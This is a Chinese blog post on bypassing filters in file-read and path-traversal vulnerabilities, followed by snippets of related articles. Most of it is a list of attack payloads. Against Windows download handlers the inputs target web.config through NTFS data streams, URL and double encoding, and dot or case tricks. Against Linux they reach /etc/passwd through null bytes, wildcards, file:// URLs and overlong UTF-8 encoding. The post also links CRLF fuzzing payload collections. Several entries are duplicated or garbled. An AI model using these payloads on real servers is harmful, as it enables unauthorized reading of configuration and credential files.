文件读取漏洞绕过

已于 2023-04-24 21:02:22 修改
阅读量726 收藏
点赞数
文章标签: 网络安全
于 2023-04-24 20:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/130349953
版权

一:windows

默认:

download.aspx?file=haohaoxuexi.doc

download.aspx?file=../web.config

突破文件名:

思路1:download.aspx?file=../web.config::$DATA    //数据流

思路2:download.aspx?file=../web.config::$DATA 空格  //数据流+空格

思路3:download.aspx?file=../web.config空格  //空格

思路4:download.aspx?file=../web.config.    //加点

思路5:download.aspx?file=../web.coNfig   //大小写

思路6:download.aspx?file=C://wwwroot/web/web.config  // 网站物理路径、

思路7:download.aspx?file=../web.config\  //反斜杆 

突破../  :

思路1:download.aspx?file=..%2Fweb.config   // url编码

思路2:download.aspx?file=..%252Fweb.config  //uncode编码

思路3:download.aspx?file=.....///web.config    

思路4:download.aspx?file=....//....//web.config    

思路5:download.aspx?file=..&/....&/web.config 

思路6:download.aspx?file=http/.....///.....///web.config

思路7:download.aspx?file=http....web.config

思路8:download.aspx?file=…/./web.config

思路9:download.aspx?file=…/./web.config

download.aspx?file=/%2e%2e%2fweb.config
download.aspx?file=%2f%2e%2e/web.config
download.aspx?file=\%2e%2e%5cweb.config
download.aspx?file=%5c%2e%2e\web.config
download.aspx?file=/%252e%252e%252fweb.config
download.aspx?file=/%252e%252e%255cweb.config
download.aspx?file=./web.config
download.aspx?file=..\web.config

download.aspx?file=.%00./web.config

download.aspx?file=.+./.+./web.config
download.aspx?file=.;./.;./web.config
download.aspx?file=.%./.%./web.config
download.aspx?file=..%5c..%5c/web.config
download.aspx?file=..././..././/web.config
 

linux:

思路1:download.php?url=../../../etc/passwd%00

思路2:download.php?url=../../../etc/passw?

思路3:/file-preview/getCorsFile?urlPath=file:///etc/passwd

思路4:/file-preview//getCorsFile?urlPath=file:///etc/passwd  //突破限制目录

思路5:/file-preview//onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO  //base64

思路6:/file-preview//onlinePreview?url=..<details>/..<details>/..<details>etc/passwd 

.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd

思路8:/file-preview//onlinePreview?url=file:///etc/passwd#a.txt

/file-preview//onlinePreview?url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

通配符还有几种形式
星号符号(*):表示任何字符(包括空字符),可以出现0次、1次或多次。例如:ls *.txt(显示当前目录下所有以 .txt 结尾的文件)


问号符号(?):表示任意单个字符。例如:ls ?.txt(显示当前目录下所有以一个字符开头,以 .txt 结尾的文件)


中括号符号([]):表示中括号内任意一个字符。例如:ls [abc]*(显示当前目录下以 a、b、c 任意一个字母开头的所有文件)


脱字符号(^):表示取反,即除了中括号内的字符以外的任意一个字符。例如:ls [^abc]*(显示当前目录下除了以 a、b、c 任意一个字母开头的所有文件)

另外还有几个设计上的问题:
Crtl注入
几个crtl  fuzz 的工具,有兴趣的小伙伴可以自己本地fuzz,大部分waf都存在
https://github.com/dwisiswant0/crlfuzz
https://github.com/Proviesec/crlf-payloads

cat /etc/passw?
低调求绕过,没事写博客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3069
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含的文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含。
CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧
2301_79688134的博客
05-06 1661
在我遇到的题目中,想要读取文件必然是要执行cat /flag这个命令,但是题目当然不会这么轻松。让你直接cat出来,必然会有各种各样的滤过条件,你要做的就是尝试各种方法在cat /flag的基础上进行各种操作构建出最终的payload。下面我就总结一下一些比较常见的过滤的条件和绕过方式。(其实过滤条件主要都是对字符的限制,再有就是对长度的限制。
[渗透测试] 任意文件读取漏洞
最新发布
Da1NtY的博客
06-25 955
使用filepath传递,在filepath中输入地址来获取文件内容。​ php.ini配置文件中,限定文件访问范围。不能有文件包含漏洞,目录遍历漏洞或者其他漏洞。使用str_replace进行替换。让用户只能访问一定的路径。
metinfo thumb.php,MetInfo 任意文件读取漏洞的修复与绕过
weixin_34711263的博客
03-26 455
漏洞简介MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件漏洞影响MetInfo 6.0.0MetInfo 6.1.0漏洞分析看到\MetInfo6\app\system\include\module\old_thumb.class.p...
任意文件读取/下载漏洞
qq_68163788的博客
05-23 2794
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
metinfo thumb.php,MetInfo任意文件读取漏洞的修复与绕过
weixin_34365336的博客
03-26 186
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。404实验室内部的WAM(Web应用监控程序,文末有关于WAM的介绍)监控到 MetInfo 版本更新,并且自动diff了文件,从diff上来看,应该是修复了一个任意文件读取漏洞,但是没有修复完全,导致还可以被绕过,本文就是记录这个漏洞的修复与绕过的过程。漏洞简介MetInfo是一套...
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 669
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
任意文件读取漏洞
m0_57276420的博客
04-08 5647
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
乌云漏洞笔记1-任意文件读取
乐枕的家
01-22 5761
阅读时间16.01.18 page1-3 敏感字段&RealPath= &FilePath= &filepath= &Path= &path= &inputFile= &url= &urls= &Lang= &dis= &data= &readfile= &filep= &src= &menu= META-INF WEB-INF可利用路径/etc/shadow /etc/passwd /
文件读取漏洞的攻防
公众号shadow sock7
12-31 1484
https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass 参考: http://wp.blkstone.me/2018/06/abusing-arbitrary-file-read/ https://wsygoogol.github.io/2017/01/27/%E4%BB%BB%E6%84%...
任意文件读取漏洞复现
来日可期的博客
08-31 4092
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
java配置文件读取绕过
夜班机器人的博客
03-30 352
%c0%ae/WEB-INF/web.xml%c0%ae/WEB-INF//sql-common.properties%c0%ae/WEB-INF//sprong-context-external.xmlWEB-INF/classes/liuxing_db.properties
Web的基本漏洞--任意文件读取与下载漏洞
尽欢的博客
06-05 2509
任意文件读取漏洞介绍、任意文件下载漏洞介绍、常见的敏感文件
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8811
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
文件包含漏洞及简单绕过
L1ni01
03-17 375
文件包含类型及利用 我们可以通过包含下列文件获取重要信息
LightCMS1.3.5-任意文件读取&RCE漏洞
LYJ20010728的博客
06-09 1552
LightCMS1.3.5-任意文件读取&RCE漏洞环境搭建(Kali) 环境搭建(Kali) 个人环境配置:php7.4.15 + mysql8.0.25 首先确保系统已安装好composer,可以参考我之前写的文章:文章链接 下载文件源码 cd /var/www/html git clone https://hub.fastgit.org/eddy8/LightCMS.git cd lightCMS composer install 设置目录权限:storage/和bootst
任意文件读取漏洞知识梳理
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取文件是服务器的各种配置文件文件形式存储的密钥、服务器信息(包括正在执行的进
9.文件上传漏洞绕过方式
05-15
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过应用程序的安全机制,将恶意文件上传到服务器上,从而实现攻击目的。常见的文件上传漏洞绕过方式包括以下几种: 1. 修改文件类型:攻击者可以修改上传文件文件类型,将恶意文件伪装成常见文件类型,绕过检测机制。 2. 绕过文件类型检测:上传文件时,应用程序会检测文件类型,如果上传的文件类型不符合要求,则会拒绝上传。攻击者可以通过修改 HTTP 头部信息或者使用特殊字符等方式,绕过文件类型检测。 3. 绕过文件大小限制:应用程序通常会限制上传文件的大小,攻击者可以通过分割文件、压缩文件等方式,绕过文件大小限制。 4. 绕过文件路径检测:应用程序会检测上传文件的路径,如果路径不符合要求,则会拒绝上传。攻击者可以通过构造特殊的路径,绕过文件路径检测。 5. 绕过文件名检测:应用程序会检测上传文件文件名,如果文件名不符合要求,则会拒绝上传。攻击者可以通过构造特殊的文件名,绕过文件名检测。 为了避免文件上传漏洞的攻击,应用程序开发人员可以采取以下措施: 1. 对上传文件进行严格的类型、大小、路径、文件名检测,确保上传的文件符合要求。 2. 对上传文件进行病毒扫描和安全检测,确保上传的文件不包含恶意代码。 3. 限制上传文件的存储路径,确保上传的文件不会对系统造成危害。 4. 对上传文件进行权限控制,确保只有授权的用户才能访问上传的文件。 5. 定期更新应用程序和服务器的安全补丁,确保系统处于最新的安全状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值